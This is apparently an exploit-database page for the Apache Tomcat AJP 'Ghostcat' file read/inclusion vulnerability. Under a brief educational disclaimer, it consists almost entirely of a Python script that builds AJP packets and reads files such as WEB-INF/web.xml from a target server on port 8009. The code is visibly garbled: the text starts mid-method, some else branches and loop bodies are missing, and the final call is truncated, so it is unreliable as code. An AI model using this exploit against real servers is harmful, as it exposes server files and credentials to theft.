Exploits / Vulnerability Discovered : 2020-02-20 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Apache tomcat ajp ghostcat file read/inclusion is for educational purposes only and if it is used you will do on your own risk!
res += pack_string(self.request_headers[h_name])
return res
def pack_attributes(self):
res = b""
for attr in self.attributes:
a_name = attr['name']
code = AjpForwardRequest.ATTRIBUTES.index(a_name) + 1
res += struct.pack("b", code)
if a_name == "req_attribute":
aa_name, a_value = attr['value']
res += pack_string(aa_name)
res += pack_string(a_value)
res += pack_string(attr['value'])
res += struct.pack("B", 0xFF)
return res
def serialize(self):
res = ""
res = struct.pack("bb", self.prefix_code, self.method)
res += pack_string(self.protocol)
res += pack_string(self.req_uri)
res += pack_string(self.remote_addr)
res += pack_string(self.remote_host)
res += pack_string(self.server_name)
res += struct.pack(">h", self.server_port)
res += struct.pack("?", self.is_ssl)
res += self.pack_headers()
res += self.pack_attributes()
if self.data_direction == AjpForwardRequest.SERVER_TO_CONTAINER:
header = struct.pack(">bbh", 0x12, 0x34, len(res))
header = struct.pack(">bbh", 0x41, 0x42, len(res))
return header + res
def parse(self, raw_packet):
stream = StringIO(raw_packet)
self.magic1, self.magic2, data_len = unpack(stream, "bbH")
self.prefix_code, self.method = unpack(stream, "bb")
self.protocol = unpack_string(stream)
self.req_uri = unpack_string(stream)
self.remote_addr = unpack_string(stream)
self.remote_host = unpack_string(stream)
self.server_name = unpack_string(stream)
self.server_port = unpack(stream, ">h")
self.is_ssl = unpack(stream, "?")
self.num_headers, = unpack(stream, ">H")
self.request_headers = {}
for i in range(self.num_headers):
code, = unpack(stream, ">H")
if code > 0xA000:
h_name = AjpForwardRequest.COMMON_HEADERS[code - 0xA001]
h_name = unpack(stream, "%ds" % code)
stream.read(1) # \0
h_value = unpack_string(stream)
self.request_headers[h_name] = h_value
def send_and_receive(self, socket, stream, save_cookies=False):
res = []
i = socket.sendall(self.serialize())
if self.method == AjpForwardRequest.POST:
return res
r = AjpResponse.receive(stream)
assert r.prefix_code == AjpResponse.SEND_HEADERS
if save_cookies and 'Set-Cookie' in r.response_headers:
self.headers['SC_REQ_COOKIE'] = r.response_headers['Set-Cookie']
# read body chunks and end response packets
while True:
r = AjpResponse.receive(stream)
if r.prefix_code == AjpResponse.END_RESPONSE:
elif r.prefix_code == AjpResponse.SEND_BODY_CHUNK:
raise NotImplementedError
def perform_request(self, req_uri, headers={}, method='GET', user=None, password=None, attributes=[]):
self.req_uri = req_uri
self.forward_request = prepare_ajp_forward_request(self.target_host, self.req_uri, method=AjpForwardRequest.REQUEST_METHODS.get(method))
print("Getting resource at ajp13://%s:%d%s" % (self.target_host, self.target_port, req_uri))
if user is not None and password is not None:
self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + ("%s:%s" % (user, password)).encode('base64').replace('\n', '')
for h in headers:
self.forward_request.request_headers[h] = headers[h]
for a in attributes:
responses = self.forward_request.send_and_receive(self.socket, self.stream)
if len(responses) == 0:
return None, None
snd_hdrs_res = responses[0]
data_res = responses[1:-1]
if len(data_res) == 0:
print("No data in response. Headers:%s\n" % snd_hdrs_res.response_headers)
return snd_hdrs_res, data_res
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("target", type=str, help="Hostname or IP to attack")
parser.add_argument('-p', '--port', type=int, default=8009, help="AJP port to attack (default is 8009)")
parser.add_argument("-f", '--file', type=str, default='WEB-INF/web.xml', help="file path :(WEB-INF/web.xml)")
args = parser.parse_args()
t = Tomcat(args.target, args.port)
_,data = t.perform_request('/asdf',attributes=[
print("".join([d.data for d in data]))